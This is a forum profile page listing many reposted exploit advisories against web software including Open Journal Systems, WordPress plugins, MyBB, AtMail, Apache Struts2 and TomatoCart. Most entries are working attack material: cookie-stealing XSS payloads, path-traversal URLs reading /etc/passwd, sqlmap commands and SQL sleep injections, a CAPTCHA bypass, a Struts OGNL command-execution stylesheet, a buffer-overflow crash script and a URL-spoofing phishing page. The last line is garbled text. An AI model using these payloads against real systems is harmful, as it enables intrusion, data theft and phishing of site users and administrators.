
Everything posted by HireHackking
-
Open Journal Systems (OJS) 2.3.6 - '/lib/pkp/classes/core/String.inc.php?String::stripUnsafeHtml()' Method Cross-Site Scripting
source: https://www.securityfocus.com/bid/52666/info Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input: 1. An arbitrary-file-deletion vulnerability 2. A security vulnerability 3. An arbitrary-file-upload vulnerability 4. Multiple cross-site scripting vulnerabilities An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected. On the following URL: http://www.example.com/index.php/[journal]/author/submit/3?articleId=[id] the attacker should inject malicious scripting code to the "Bio Statement" or "Abstract of Submission" fields: <img src="x"/onerror=alert(document.cookie)> or (browser specific): <img style="width:expression(alert(document.cookie));"></a> The stored XSS will be displayed here: http://www.example.com/index.php/[submission]/author/submission/[id]
-
Open Journal Systems (OJS) 2.3.6 - 'rfiles.php' Traversal Arbitrary File Manipulation
source: https://www.securityfocus.com/bid/52666/info Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input: 1. An arbitrary-file-deletion vulnerability 2. A security vulnerability 3. An arbitrary-file-upload vulnerability 4. Multiple cross-site scripting vulnerabilities An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected. http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=delete|/../../../../../../../../../../../../../../../../../../../temp/file_to_delete Arbitrary File Renaming: http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=rename|file.jpg|file.php%00.jpg http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=rename|/../../../../../../../../../../../../../../../../../../../tmp/file_to_move|1x.jpg
-
PHPCollab 2.5 - 'deletetopics.php' SQL Injection
# Exploit Title: PHPCollab 2.5 - SQL Injection # Google Dork: filetype:php inurl:"/general/login.php?PHPSESSID=" # Date: 13/05/2015 # Exploit Author: Wad Deek # Vendor Homepage: http://www.phpcollab.com/ # Software Link: http://sourceforge.net/projects/phpcollab/files/final/2.5/ # Version: 2.5 +>2.5<+ --> /docs/changes.txt +>2.5<+ --> /docs/readme.txt # Tested on: Xampp on Windows7 ################################################################################### PoC = http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27 ################################################################################### #===================================================== require('mechanize') agent = Mechanize.new() agent.redirect_ok = false agent.verify_mode = OpenSSL::SSL::VERIFY_NONE #===================================================== begin html = agent.get("http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27") rescue else puts(html.body()) end #=====================================================
-
Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload
source: https://www.securityfocus.com/bid/52666/info Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input: 1. An arbitrary-file-deletion vulnerability 2. A security vulnerability 3. An arbitrary-file-upload vulnerability 4. Multiple cross-site scripting vulnerabilities An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected. Malicious registered user shall start a new Submission: http://www.example.com/index.php/[journal]/author/submit/1 on the second step of the Submission: http://www.example.com/index.php/[journal]/author/submit/2?articleId=14 the user should upload test.pHp, test.asp, test.cgi, test.php3 or test.html file. The uploaded file will be available on the following URL: http://www.example.com/files/journals/[journalid]/articles/[articleid]/submission/original/[newfilename] The original file name will be changed, however it will be displayed to the user after upload (for example "16-28-1-SM.pHp"). File extension will remain the same.
-
WordPress Plugin Booking Calendar Contact Form 1.0.2 - Multiple Vulnerabilities
# Exploit Title: WordPress Booking Calendar Contact Form 1.0.2[Multiple vulnerabilities] # Date: 2015-05-01 # Google Dork: Index of /wordpress/wp-content/plugins/booking-calendar-contact-form/ # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ] # Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form # Vendor: CodePeople.net # Vebdor URI: http://codepeople.net # Version: 1.0.2 # OWASP Top10: A1-Injection # Tested on: windows 7 ultimate + firefox + sqlmap 0.9. ============================================ * Authenticated SQL injection ============================================ ======================== Description ======================== In a site that has installed the plugin vulnerable and an attacker who has an account editor privileges can exploit the flaw SQL injection and possibly escalate their privileges. ======================== Vulnerability ======================== vulnerable function code is located in dex_bcf.php function dex_bccf_load_season_prices() { global $wpdb; if ( ! current_user_can('edit_pages') ) { echo 'No enough privilegies to load this content.'; exit; } if (!defined('CP_BCCF_CALENDAR_ID')) define ('CP_BCCF_CALENDAR_ID',$_GET["dex_item"]); //.....vulnerable line $codes = $wpdb->get_results( 'SELECT * FROM '.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE `cal_id`='.CP_BCCF_CALENDAR_ID); $maxcosts = 0; ... if (count ($codes)) { ... //Print results [bueno para seleccion mediante UNION] foreach ($codes as $value) { echo '<tr>'; $price = explode(';',$value->price); echo '<td>'.$price[0].'</td>'; for ($k=1; $k<=$maxcosts; $k++) echo '<td>'.@$price[$k].'</td>'; echo '<td>'.substr($value->date_from,0,10).'</td>'; echo '<td>'.substr($value->date_to,0,10).'</td>'; echo '<td>[<a href="javascript:dex_delete_season_price('.$value->id.')">Delete</a>]</td>'; echo '</tr>'; } ... } ====================== Injection ====================== the following urls can be used to inject code. ---------------------------------------------------------- http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1 ------------------------ GET parameter vulnerable ------------------------ dex_item ======================== injection techniques: ======================== -> UNION BASED -> TIME BASED BLIND ======================= POC ======================= Obtaining all available databases from mysql server with sqlmap. --------------------------------------------------------------- python sqlmap.py --url=" http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1 " -p dex_item --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs ==================================================== ===================================================== * Filter bypass & Authenticated SQL injection ===================================================== =============== Vulnerable code ================ function dex_bccf_calendar_delete($ret) { global $wpdb; $wpdb->query( "delete from ".TDE_BCCFCALENDAR_DATA_TABLE." where id=".esc_sql($_POST["id"]) ); return $ret; } ====================== Injection ====================== Following URLs are affected. ---------------------------------------------------------- http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete ------------------------ POST parameter vulnerable ------------------------ id ======================== injection techniques: ======================== -> TIME BASED BLIND ======================= POC ======================= Obtaining all available databases from mysql server with sqlmap. --------------------------------------------------------------- python sqlmap.py --url=" http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete " --data="id=1" -p id --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs --technique T ==================================================== * Authenticated SQL injection ==================================================== =============== Vulnerable code ================ function dex_bccf_calendar_update($ret) { global $wpdb; dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "viadmin", "varchar(10) DEFAULT '0' NOT NULL"); dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "color", "varchar(10)"); $wpdb->query("update ".TDE_BCCFCALENDAR_DATA_TABLE." set title='".esc_sql($_POST["title"])."',description='".esc_sql($_POST["description"])."',color='".esc_sql($_POST["color"])."' where id=".esc_sql($_POST["id"]) ); return $ret; } ====================== Injection ====================== Following URLs are affected. ---------------------------------------------------------- http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit ------------------------ POST parameter vulnerable ------------------------ id ======================== injection techniques: ======================== -> BLIND ======================= POC ======================= (modifing all rows with "i0akiN" value and sleeping 5 seconds) url ------- http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit ---------- post data ---------- id=0 or 1=1 AND SLEEP(5) -- - &tile=i0akiN&description=i0akiN&color=i0akiN ===================================================== * Filter bypass & Authenticated SQL injection ===================================================== =============== Vulnerable code ================ function dex_bccf_calendar_add($ret) { global $wpdb; $calid = str_replace (TDE_BCCFCAL_PREFIX, "",@$_GET["id"]); ... $wpdb->query("insert into ".TDE_BCCFCALENDAR_DATA_TABLE."(viadmin,reservation_calendar_id,datatime_s,datatime_e,title,description,color) ". " values(1,".esc_sql($calid).",'".esc_sql($_POST["startdate"])."','".esc_sql($_POST["enddate"])."','".esc_sql($_POST["title"])."','" .esc_sql($_POST["description"])."','".esc_sql($_POST["color"])."')"); .. } ====================== Injection ====================== Following URLs are affected. ---------------------------------------------------------- http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&id=[SQLi] ======================== injection techniques: ======================== -> Insertion data ======================= POC ======================= Insert a row into wp_bccf_reservation_calendars_data table without use other post parameters http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add& id=12,0x617373,0x617373,0x617373,0x617373,0x617373); -- - ==================================================== * Unauthenticated SQL injection ==================================================== ======================= Description ======================= An attacker without autorization can send modified requests to database and sensitive information that can use for escalate privilegies and more... ====================== Vulnerability ====================== vulnerable function code is located in dex_bcf.php function dex_bccf_caculate_price($startday, $enddate, $calendar, $default_price) { ... //$calendar is not sanitized in sql query $codes = $wpdb->get_results( 'SELECT * FROM '.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE `cal_id`='.$calendar); $mode = (dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) == 'false'); while ( (($enddate>$startday) && !$mode) || (($enddate>=$startday) && $mode) ) { $daily_price = $default_price; $sprice = array(); foreach ($codes as $value) { $sfrom = strtotime($value->date_from); $sto = strtotime($value->date_to); if ($startday >= $sfrom && $startday <= $sto) { $sprice = explode (';', $value->price); $daily_price = $sprice[0]; } } $season_prices[] = $sprice; $price += $daily_price; $startday = strtotime (date("Y-m-d", $startday)." +1 day"); //60*60*24; $days++; } ... } ====================== Injection ====================== Following URLs are affected. ---------------------------------------------------------- http://wp-host/wp-path/?action=dex_bccf_check_posted_data&dex_bccf=getcost ------------------------ post variable vulnerable ------------------------ dex_item=1 ======================== injection techniques: ======================== -> UNION BASED <- yeaahh!! -> TIME BASED BLIND -> BOOLEAN BASED BLIND ======================== POC ======================== Obtaining all available databases from mysql server with sqlmap. python sqlmap.py --url=" http://localhost/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost " --data="dex_item=1" -p dex_item --level=5 --risk=3 --dbms="mysql" --dbs --tecnique U =========================================================== ============================================================ * Unauthenticated SQL injection 2 ============================================================ ======================== Description ======================== The following function is also vulnerable to SQL injection because usually the variable CP_BCCF_CALENDAR_ID it equals the content of POST ['dex_item'] or GET ['dex_item'] Besides this function is used in several places the code. ======================== Vulnerability ======================== Vulnerable function: function dex_bccf_get_option ($field, $default_value) { global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id; if (!defined("CP_BCCF_CALENDAR_ID")) return $default_value; if ($dex_option_buffered_id == CP_BCCF_CALENDAR_ID) $value = @$dex_option_buffered_item->$field; else { //....vulnerable line $myrows = $wpdb->get_results( "SELECT * FROM ".DEX_BCCF_CONFIG_TABLE_NAME." WHERE id=".CP_BCCF_CALENDAR_ID ); $value = @$myrows[0]->$field; $dex_option_buffered_item = $myrows[0]; $dex_option_buffered_id = CP_BCCF_CALENDAR_ID; } if ($value == '' && $dex_option_buffered_item->calendar_language == '') $value = $default_value; return $value; } ########################################## ====================================== * CAPTCHA BYPASS & ROW INSERTION ====================================== ============== DESCRIPTION ============== An attacker can manipulate some variables for bypass conditional staments. For example: insert unlimited rows into table (could use a program) ============= ... HOW? ============= An attacker encodes parameter GET['hdcaptcha_dex_bccf_post'] to MD5 encryption saving into value of "rand_code" cookie. ========== POC ========== REQUEST ----------- http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&hdcaptcha_dex_bccf_post=1& dex_item=1& http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data& hdcaptcha_dex_bccf_post=1&dex_item=1&hdcaptcha_dex_bccf_post=joaquin ^ -------------- | POST VARIABLES -------------- hdcaptcha_dex_bccf_post=1 ------- COOKIES ------- rand_code=a6beca7f198112079f836a4e67cf4821 <---joaquin MD5 encrypted =========================== VULNERABLE FUNCTION CODE ========================== function dex_bccf_check_posted_data(){ .... if (!isset($_GET['hdcaptcha_dex_bccf_post']) ||$_GET['hdcaptcha_dex_bccf_post'] == '') $_GET['hdcaptcha_dex_bccf_post'] = @$_POST['hdcaptcha_dex_bccf_post']; if ( (dex_bccf_get_option('dexcv_enable_captcha', TDE_BCCFDEFAULT_dexcv_enable_captcha) != 'false') && ( (strtolower($_GET['hdcaptcha_dex_bccf_post']) != strtolower($_SESSION['rand_code'])) || ($_SESSION['rand_code'] == '') ) && ( (md5(strtolower($_GET['hdcaptcha_dex_bccf_post'])) != ($_COOKIE['rand_code'])) || ($_COOKIE['rand_code'] == '') ) ) { $_SESSION['rand_code'] = ''; echo 'captchafailed'; exit; } // if this isn't the real post (it was the captcha verification) then echo ok and exit if ( 'POST' != $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['dex_bccf_post'] ) ) { echo 'ok'; exit; } ... } ########################################### ======================================= * Persistent JS/HTML code injection ======================================= ======================== Description: ======================== Un atacante sin autenticacion puede inyectar codigo malicioso que podria ejecutar el navegador de la victima(could be an administrator). Cuando la victima visite la pagina modificada, el atacante podria robar datos y/o controlar las acciones de la victima de forma remota. ======================== Vulnerability ======================== http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data POST-DATA dex_item=2 dex_bccf_post_options=1 email_confirmation_to_user=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION %3Ctextarea%3E email_notification_to_admin=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION %3Ctextarea%3E Parameters email_confirmation_to_user,email_notification_to_admin not filtered and is included in admin page ==================== VULNERABLE FUNCTION ==================== dex_bccf_save_options() located in dex_bccf.php save unfiltered post data #########################################
-
Minify 2.1.x - 'g' Cross-Site Scripting
source: https://www.securityfocus.com/bid/52672/info Minify is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Minify 2.1.3 and 2.1.4-beta are vulnerable; other versions may also be affected. http://www.exmaple.com/min/builder/#g=[XSS]
-
Event Calendar PHP - 'cal_year' Cross-Site Scripting
source: https://www.securityfocus.com/bid/52701/info Event Calendar PHP is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/demo_eventcalendar.php?cal_id=1&cal_month=2&cal_year=[XSS]
-
AtMail 1.04 - Multiple Vulnerabilities
source: https://www.securityfocus.com/bid/52684/info AtMail is prone to multiple directory-traversal vulnerabilities, an arbitrary-file-upload vulnerability, and an information-disclosure vulnerability because the application fails to sanitize user-supplied input. An attacker can exploit these issues to obtain sensitive information, upload arbitrary code, and run it in the context of the webserver process. Atmail 1.04 is vulnerable; other versions may also be affected. https://www.example.com/compose.php?func=renameattach&unique=/..././..././..././..././..././..././..././..././..././..././..././..././tmp/positive.test%00&Attachment[]=/../../../../../../../../../etc/passwd https://www.example.com/compose.php?func=renameattach&unique=1.txt%00&Attachment[]=/../../../../../../../../../etc/passwd https://www.example.com/mime.php?file=%0A/../../../../../../../../../etc/passwd&name=positive.html
-
Zumset.com FbiLike 1.00 - 'id' Cross-Site Scripting
source: https://www.securityfocus.com/bid/52720/info FbiLike is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. FbiLike 1.00 is vulnerable; other versions may also be affected. http://www.example.com/fbilike/like.php?id=[XSS]
-
Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload
source: https://www.securityfocus.com/bid/52702/info Apache Struts2 is prone to a remote arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input. Attackers can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. <?xml version="1.0" encoding="UTF-8" ?> <xsl:stylesheet xmlns:xsl="http://www.example.com/1999/XSL/Transform" version="1.0" xmlns:ognl="ognl.Ognl"> <xsl:template match="/"> <html> <body> <h2>hacked by kxlzx</h2> <h2>http://www.example.com</h2> <exp> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/> </exp> </body> </html> </xsl:template> </xsl:stylesheet>
-
NextBBS 0.6 - 'ajaxserver.php' Multiple SQL Injections
source: https://www.securityfocus.com/bid/52728/info NextBBS is prone to multiple SQL-injection vulnerabilities, a cross-site scripting vulnerability, and an authentication-bypass vulnerability. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and bypass the authentication process to gain unauthorized access to the system. NextBBS 0.6.0 is vulnerable; other versions may also be affected. http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=findusers&curstr=war%2527axe http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=isidavailable&id=war%2527axe http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=getgreetings&username=war%2527axe
-
Geeklog 1.8.1 - 'index.php' SQL Injection
source: https://www.securityfocus.com/bid/52725/info Geeklog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Geeklog 1.8.1 is vulnerable; other versions may also be affected. http://www.example.com/easyfile/index.php?folder=(SQLI)
-
iFTP 2.21 - Buffer Overflow Crash (PoC)
#!/usr/bin/python ########################################################################################### #Exploit Title:iFTP 2.21 Buffer OverFlow Crash PoC #Author: dogo h@ck #Date Discovered : 12-5-2015 #Vendor Homepage: http://www.memecode.com/iftp.php #Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe #Version: 2.21 #Tested on : Windows XP Sp3 ########################################################################################### #Crash : Go to Connect > Host Address > Post it #Bad Characters (\x00\x09\x0a\x0d\x80 and all from \x80 To \xFF I know It's FU&^% :( ) ############################################################################################ buffer = "A"*1865 buffer +="BBBB" #Pointer to next SEH record buffer +="CCCC" #SE handler buffer +="D"*500 file = "buffer.txt" f = open(file, "w") f.write(buffer) f.close()
-
NextBBS 0.6 - 'index.php?do' Cross-Site Scripting
source: https://www.securityfocus.com/bid/52728/info NextBBS is prone to multiple SQL-injection vulnerabilities, a cross-site scripting vulnerability, and an authentication-bypass vulnerability. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and bypass the authentication process to gain unauthorized access to the system. NextBBS 0.6.0 is vulnerable; other versions may also be affected. http://www.example.com/nextbbs.0.6.0/index.php?do=<body+onload=alert(document.cookie);>
-
Matthew1471 BlogX - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/52730/info Matthew1471 BlogX is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/About.asp?ShowOriginal="><SCRIPT>alert("demonalex");</SCRIPT>&ShowNew=a&ShowChanges=b http://www.example.com/About.asp?ShowOriginal=Y&ShowNew="><SCRIPT>alert("demonalex");</SCRIPT>&ShowChanges=b http://www.example.com/About.asp?ShowOriginal=Y&ShowNew=a&ShowChanges="><SCRIPT>alert("demonalex");</SCRIPT> http://www.example.com/Search.asp?Search=</title><SCRIPT>alert("demonalex");</SCRIPT>&Page=0
-
WordPress Plugin Integrator 1.32 - 'redirect_to' Cross-Site Scripting
source: https://www.securityfocus.com/bid/52739/info WordPress Integrator is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Integrator 1.32 is vulnerable; other versions may also be affected. http://www.example.com/wordpress/wp-login.php?redirect_to=http://%3F1<ScrIpT>alert(666)</ScrIpT>
-
Invision Power Board (IP.Board) 4.2.1 - 'searchText' Cross-Site Scripting
source: https://www.securityfocus.com/bid/52740/info Invision Power Board is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Invision Power Board 4.2.1 is vulnerable; other versions may also be affected. http://www.example.com/index.php?s=blablabla&&app=gallery&module=ajax§ion=albumSelector&do=albumSelectorPane&secure_key=blalblabla&type=upload&albums=search&moderate=&album_id=1593&member_id=&searchType=member&searchMatch=is&searchIsGlobal=0&searchSort=date&searchDir=desc&searchText=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000252%29%3C%2Fscript%3E
-
Apple Safari 5.1.5 For Windows - 'window.open()' URI Spoofing
source: https://www.securityfocus.com/bid/52746/info Apple Safari for Windows is affected by a URI-spoofing vulnerability. An attacker may leverage this issue to spoof the source URI of a site presented to an unsuspecting user. This may lead to a false sense of trust because the user may be presented with a source URI of a trusted site while interacting with the attacker's malicious site. Versions prior to Apple Safari 5.1.5 on Windows systems are vulnerable. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.example.com/TR/html4/loose.dtd"> <html> <head> <title>Safari for windows 5.1.5 and prior URL spoof window.open() test case.</title> <script type="text/javascript"> var wx; function invokePoC() { wx = open("http://www:example.com/login","newwin"); setInterval("doit()",1); } function doit() { wx.document.open(); wx.document.write("<title>Bank of America | Home | Personal</title><body><img src=''/><h1></b>Hello !! i'm a Spoofed Site !!!</b></h1></body>"); } </script> </head> <body onload="invokePoC()"> <h1>Safari for windows 5.1.5 and prior URL pseudo-spoof window.open() test case.</h1> <noscript><p>this testcase requires JavaScript to run.</p></noscript> <p>First Click in this link ==> <a href="http://www.example.com/login" onClick="location.reload();" target="_blank">invoke PoC</a></p> <p>and Look in result window, the address bar , show The url and if you write any url in the address bar, the browser can't navigate to it. This issue can be used to spoof sites or pishing attacks. Vulnerable Safari for windows 5.1.5 and prior versions, also Safari for IOS is Too vulnerable. </body> </html>
-
MyBB 1.6.6 - 'index.php?conditions[usergroup][]' SQL Injection
source: https://www.securityfocus.com/bid/52743/info MyBB is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability. Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. MyBB 1.6.6 is vulnerable; other versions may also be affected. POST /mybb/admin/index.php?module=user-users&action=search HTTP/1.1 Host: 192.168.7.5 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.7.5/mybb/admin/index.php?module=user-users&action=search Cookie: mybb[lastvisit]=1332694756; mybb[lastactive]=1332699650; mybb[referrer]=1; loginattempts=1; adminsid=a82d27dd72efdb0a99c009db7701e847; acploginattempts=0; mybbuser=1_CAo7pz2wUvHGtlJht9OLGyXG8ZVbS78xAXx6ZTzBrvNSe5S2GM; sid=d725ac10b7d8f0f8765dfa73f5dcf23b Content-Type: application/x-www-form-urlencoded Content-Length: 638 my_post_key=5dbe489b5b03d9d9e2d387ff9267567d&conditions%5Busername%5D=aditya&conditions%5Bemail%5D=aditya &conditions%5Busergroup%5D%5B%5D=2'&conditions%5Bwebsite%5D=&conditions%5Bicq%5D=&conditions%5Baim%5D= &conditions%5Byahoo%5D=&conditions%5Bmsn%5D=&conditions%5Bsignature%5D=&conditions%5Busertitle%5D= &conditions%5Bpostnum_dir%5D=greater_than&conditions%5Bpostnum%5D=&conditions%5Bregdate%5D= &conditions%5Bregip%5D=&conditions%5Blastip%5D=&conditions%5Bpostip%5D=&profile_fields%5Bfid3%5D%5Bfid3%5D=N%2FA &profile_fields%5Bfid1%5D=&profile_fields%5Bfid2%5D=&sortby=username&order=asc&perpage=&displayas=card
-
MyBB 1.6.6 - 'index.php?conditions[usergroup][]' Cross-Site Scripting
source: https://www.securityfocus.com/bid/52743/info MyBB is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability. Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. MyBB 1.6.6 is vulnerable; other versions may also be affected. POST /mybb/admin/index.php?module=user-users&action=search HTTP/1.1 Host: 192.168.7.5 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.7.5/mybb/admin/index.php?module=user-users&action=search Cookie: mybb[lastvisit]=1332694756; mybb[lastactive]=1332699650; mybb[referrer]=1; loginattempts=1; adminsid=a82d27dd72efdb0a99c009db7701e847; acploginattempts=0; mybbuser=1_CAo7pz2wUvHGtlJht9OLGyXG8ZVbS78xAXx6ZTzBrvNSe5S2GM; sid=d725ac10b7d8f0f8765dfa73f5dcf23b Content-Type: application/x-www-form-urlencoded Content-Length: 638 my_post_key=5dbe489b5b03d9d9e2d387ff9267567d&conditions%5Busername%5D=aditya&conditions%5Bemail%5D=aditya &conditions%5Busergroup%5D%5B%5D=2<script>document.write(Date())</script>&conditions%5Bwebsite%5D=&conditions%5Bicq%5D= &conditions%5Baim%5D=&conditions%5Byahoo%5D=&conditions%5Bmsn%5D=&conditions%5Bsignature%5D=&conditions%5Busertitle%5D= &conditions%5Bpostnum_dir%5D=greater_than&conditions%5Bpostnum%5D=&conditions%5Bregdate%5D= &conditions%5Bregip%5D=&conditions%5Blastip%5D=&conditions%5Bpostip%5D=&profile_fields%5Bfid3%5D%5Bfid3%5D=N%2FA &profile_fields%5Bfid1%5D=&profile_fields%5Bfid2%5D=&sortby=username&order=asc&perpage=&displayas=card
-
TomatoCart 1.2.0 Alpha 2 - 'json.php' Local File Inclusion
source: https://www.securityfocus.com/bid/52766/info TomatoCart is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. TomatoCart 1.2.0 Alpha 2 is vulnerable; other versions may also be affected. http://www.example.com/json.php?action=3&module=../../../../../../../../../../../../../../boot.ini%00
-
ã¿ã€ãã«ïŒåŠæ ¡ã®ã€ã³ãã©ãããã®æµžéãã¹ã
